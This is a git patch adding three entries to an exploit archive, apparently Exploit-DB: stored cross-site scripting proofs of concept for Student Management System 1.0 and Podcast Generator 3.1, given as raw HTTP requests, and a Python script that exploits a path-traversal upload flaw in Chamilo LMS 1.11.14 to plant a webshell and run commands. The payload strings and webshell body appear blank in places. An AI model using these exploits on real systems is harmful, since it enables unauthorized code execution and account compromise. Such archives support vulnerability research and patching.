From 8845e341e475d5f9035a89d497c810db563e210b Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 15 May 2021 05:01:51 +0000 Subject: [PATCH] DB: 2021-05-15 3 changes to exploits/shellcodes Student Management System 1.0 - 'message' Persistent Cross-Site Scripting (Authenticated) Podcast Generator 3.1 - 'Long Description' Persistent Cross-Site Scripting (XSS) Chamilo LMS 1.11.14 - Remote Code Execution (Authenticated) --- exploits/php/webapps/49865.txt | 29 +++++++++ exploits/php/webapps/49866.txt | 112 +++++++++++++++++++++++++++++++++ exploits/php/webapps/49867.py | 71 +++++++++++++++++++++ files_exploits.csv | 3 + 4 files changed, 215 insertions(+) create mode 100644 exploits/php/webapps/49865.txt create mode 100644 exploits/php/webapps/49866.txt create mode 100755 exploits/php/webapps/49867.py diff --git a/exploits/php/webapps/49865.txt b/exploits/php/webapps/49865.txt new file mode 100644 index 000000000..34b35bba3 --- /dev/null +++ b/exploits/php/webapps/49865.txt @@ -0,0 +1,29 @@ +# Exploit Title: Student Management System 1.0 - 'message' Persistent Cross-Site Scripting (Authenticated) +# Date: 2021-05-13 +# Exploit Author: mohsen khashei (kh4sh3i) or kh4sh3i@gmail.com +# Vendor Homepage: https://github.com/amirhamza05/Student-Management-System +# Software Link: https://github.com/amirhamza05/Student-Management-System/archive/refs/heads/master.zip +# Version: 1.0 +# Tested on: ubuntu 20.04.2 + +# --- Description --- # + +# The web application allows for an Attacker to inject persistent Cross-Site-Scripting payload in Live Chat. + + +# --- Proof of concept --- # + +1- Login to Student Management System +2- Click on Live Chat button +3- Inject this payload and send : +5- Xss popup will be triggered. + + +# --- Malicious Request --- # + +POST /nav_bar_action.php HTTP/1.1 +Host: (HOST) +Cookie: (PHPSESSID) +Content-Length: 96 + +send_message_chat%5Bmessage%5D= \ No newline at end of file diff --git a/exploits/php/webapps/49866.txt b/exploits/php/webapps/49866.txt new file mode 100644 index 000000000..ba7804352 --- /dev/null +++ b/exploits/php/webapps/49866.txt @@ -0,0 +1,112 @@ +# Exploit Title: Podcast Generator 3.1 - 'Long Description' Persistent Cross-Site Scripting (XSS) +# Date: 13/05/2021 +# Exploit Author: Ayşenur KARAASLAN +# Vendor Homepage: https://podcastgenerator.net/demoV2/ +# Software Link: https://podcastgenerator.net/download and https://github.com/PodcastGenerator/PodcastGenerator/archive/v3.1.1.zip +# Version: < 3.1.1 +# CVE: N/A + +Podcast Generator is an open source Content Management System written in PHP and specifically designed for podcast publishing. + +#Description +The following is PoC to use the XSS bug with unauthorized user. + +1. Login to your admin account. +2. "Upload New Episode" or "Edit" field has got "Long Description". Long Description field is not filtered. It is possible to place JavaScript code. +3. Click the Home button +4. Click "More" button of created or edited episode. + +# Vulnerable Parameter Type: POST +# Vulnerable Parameter: long_description +# Attack Pattern: + +#PoC +HTTP Request: + +POST /demoV2/pg/?p=admin&do=edit&c=ok HTTP/1.1 +Host: podcastgenerator.net +Cookie: PHPSESSID=2k93317b1dcraih0ti3p8rehc4; +_ga=GA1.2.2015734934.1620928725; _gid=GA1.2.1455863373.1620928725 +Content-Length: 1590 +Cache-Control: max-age=0 +Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90" +Sec-Ch-Ua-Mobile: ?0 +Upgrade-Insecure-Requests: 1 +Origin: https://podcastgenerator.net +Content-Type: multipart/form-data; +boundary=----WebKitFormBoundaryMJiUJ3BGzyG5zwxd +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 +(KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: frame +Referer: +https://podcastgenerator.net/demoV2/pg/?p=admin&do=edit&=episode&name=aysenurxss-poc.jpg +Accept-Encoding: gzip, deflate +Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 +Connection: close + +------WebKitFormBoundaryMJiUJ3BGzyG5zwxd +Content-Disposition: form-data; name="userfile" + +aysenurxss-poc.jpg +------WebKitFormBoundaryMJiUJ3BGzyG5zwxd +Content-Disposition: form-data; name="title" + +Aysenur-PoC +------WebKitFormBoundaryMJiUJ3BGzyG5zwxd +Content-Disposition: form-data; name="description" + +poc +------WebKitFormBoundaryMJiUJ3BGzyG5zwxd +Content-Disposition: form-data; name="countdown" + +255 +------WebKitFormBoundaryMJiUJ3BGzyG5zwxd +Content-Disposition: form-data; name="category[]" + +about +------WebKitFormBoundaryMJiUJ3BGzyG5zwxd +Content-Disposition: form-data; name="Day" + +13 +------WebKitFormBoundaryMJiUJ3BGzyG5zwxd +Content-Disposition: form-data; name="Month" + +5 +------WebKitFormBoundaryMJiUJ3BGzyG5zwxd +Content-Disposition: form-data; name="Year" + +2021 +------WebKitFormBoundaryMJiUJ3BGzyG5zwxd +Content-Disposition: form-data; name="Hour" + +14 +------WebKitFormBoundaryMJiUJ3BGzyG5zwxd +Content-Disposition: form-data; name="Minute" + +29 +------WebKitFormBoundaryMJiUJ3BGzyG5zwxd +Content-Disposition: form-data; name="long_description" + + +------WebKitFormBoundaryMJiUJ3BGzyG5zwxd +Content-Disposition: form-data; name="keywords" + +poc +------WebKitFormBoundaryMJiUJ3BGzyG5zwxd +Content-Disposition: form-data; name="explicit" + +no +------WebKitFormBoundaryMJiUJ3BGzyG5zwxd +Content-Disposition: form-data; name="auth_name" + +aysenur +------WebKitFormBoundaryMJiUJ3BGzyG5zwxd +Content-Disposition: form-data; name="auth_email" + +aysenur@emailaddress.com +------WebKitFormBoundaryMJiUJ3BGzyG5zwxd-- \ No newline at end of file diff --git a/exploits/php/webapps/49867.py b/exploits/php/webapps/49867.py new file mode 100755 index 000000000..e0a6d3aaa --- /dev/null +++ b/exploits/php/webapps/49867.py @@ -0,0 +1,71 @@ +# Exploit Title: Chamilo LMS 1.11.14 - Remote Code Execution (Authenticated) +# Date: 13/05/2021 +# Exploit Author: M. Cory Billington (@_th3y) +# Vendor Homepage: https://chamilo.org +# Software Link: https://github.com/chamilo/chamilo-lms +# Version: 1.11.14 +# Tested on: Ubuntu 20.04.2 LTS +# CVE: CVE-2021-31933 +# Writeup: https://theyhack.me/CVE-2021-31933-Chamilo-File-Upload-RCE/ + +from requests import Session +from random import choice +from string import ascii_lowercase + +import requests + +# This is all configuration stuff, +url = "http://127.0.0.1/chamilo-lms/" # URL to remote host web root +user_name = "admin" # User must be an administrator +password = "admin" +command = "id;whoami" + +# Where you want to upload your webshell. Must be writable by web server user. +# This spot isn't protectec by .htaccess +webshell_path = 'web/' +webshell_name = f"shell-{''.join(choice(ascii_lowercase) for _ in range(6))}.phar" # Just a random name for webshell file +content = f"" + +def main(): + # Run a context manager with a session object to hold login session after login + with Session() as s: + login_url = f"{url}index.php" + login_data = { + "login": user_name, + "password": password + } + r = s.post(login_url, data=login_data) # login request + + # Check to see if login as admin user was successful. + if "admin" not in r.url: + print(f"[-] Login as {user_name} failed. Need to be admin") + return + print(f"[+] Logged in as {user_name}") + print(f"[+] Cookie: {s.cookies}") + file_upload_url = f"{url}main/upload/upload.php" + # The 'curdirpath' is not santitized, so I traverse to the '/var/www/html/chamilo-lms/web/build' directory. I can upload to /tmp/ as well + php_webshell_file = { + "curdirpath": (None, f"/../../../../../../../../../var/www/html/chamilo-lms/{webshell_path}"), + "user_upload": (webshell_name, content) + } + + ## Good command if you want to see what the request looks like without sending + # print(requests.Request('POST', file_upload_url, files=php_webshell_file).prepare().body.decode('ascii')) + + # Two requests required to actually upload the file + for i in range(2): + s.post(file_upload_url, files=php_webshell_file) + + exploit_request_url = f"{url}{webshell_path}{webshell_name}" + print("[+] Upload complete!") + print(f"[+] Webshell: {exploit_request_url}") + + # This is a GET request to the new webshell to trigger code execution + command_output = s.get(exploit_request_url) + print("[+] Command output:\n") + print(command_output.text) + + + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 2384ca6cd..5ec3b7bd2 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -44030,3 +44030,6 @@ id,file,description,date,author,type,platform,port 49860,exploits/php/webapps/49860.txt,"Dental Clinic Appointment Reservation System 1.0 - Authentication Bypass (SQLi)",2021-05-13,"Mesut Cetin",webapps,php, 49861,exploits/php/webapps/49861.txt,"Dental Clinic Appointment Reservation System 1.0 - 'date' UNION based SQL Injection (Authenticated)",2021-05-13,"Mesut Cetin",webapps,php, 49862,exploits/linux/webapps/49862.py,"ZeroShell 3.9.0 - Remote Command Execution",2021-05-13,"Fellipe Oliveira",webapps,linux, +49865,exploits/php/webapps/49865.txt,"Student Management System 1.0 - 'message' Persistent Cross-Site Scripting (Authenticated)",2021-05-14,"mohsen khashei",webapps,php, +49866,exploits/php/webapps/49866.txt,"Podcast Generator 3.1 - 'Long Description' Persistent Cross-Site Scripting (XSS)",2021-05-14,"Ayşenur KARAASLAN",webapps,php, +49867,exploits/php/webapps/49867.py,"Chamilo LMS 1.11.14 - Remote Code Execution (Authenticated)",2021-05-14,"M. Cory Billington",webapps,php,